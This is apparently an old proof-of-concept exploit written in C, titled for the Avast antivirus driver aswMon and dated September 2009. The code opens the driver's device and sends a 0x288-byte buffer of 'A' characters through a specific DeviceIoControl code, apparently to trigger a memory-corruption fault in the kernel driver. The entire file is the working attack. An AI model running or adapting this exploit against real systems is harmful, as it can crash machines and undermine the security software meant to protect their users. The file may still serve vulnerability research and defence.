Avast-aswMon2-expl.c

24 сентября, 2009

#define WIN32_LEAN_AND_MEAN
#include < windows.h>
#include < stdio.h>
BOOL OpenDevice(PWSTR DriverName, HANDLE *lphDevice) //taken from esagelab
{
WCHAR DeviceName[MAX_PATH]; HANDLE hDevice;
if ((GetVersion() & 0xFF) >= 5) {
wcscpy(DeviceName, L"\\\\.\\Global\\");
} else {
wcscpy(DeviceName, L"\\\\.\\"); }
wcscat(DeviceName, DriverName); printf("Opening.. %S\n", DeviceName);
hDevice = CreateFileW(DeviceName, GENERIC_READ |
GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

if (hDevice == INVALID_HANDLE_VALUE) {
printf("CreateFile() ERROR %d\n", GetLastError()); return FALSE;
}
*lphDevice = hDevice; return TRUE;
}

int main() {
HANDLE hDev = NULL; DWORD Junk;
if(!OpenDevice(L"aswMon",&hDev)) {
printf("Unable to access aswMon"); return(0);
}

char *Buff = (char *)VirtualAlloc(NULL, 0x288, MEM_RESERVE |
MEM_COMMIT, PAGE_EXECUTE_READWRITE);

if (Buff)
{
memset(Buff, 'A', 0x288);
DeviceIoControl(hDev,0xB2C80018,Buff, 0x288,Buff,0x288,&Junk,(LPOVERLAPPED)NULL);
printf("DeviceIoControl Executed..\n");
}
else { printf("VirtualAlloc() ERROR %d\n", GetLastError()); }
return(0); }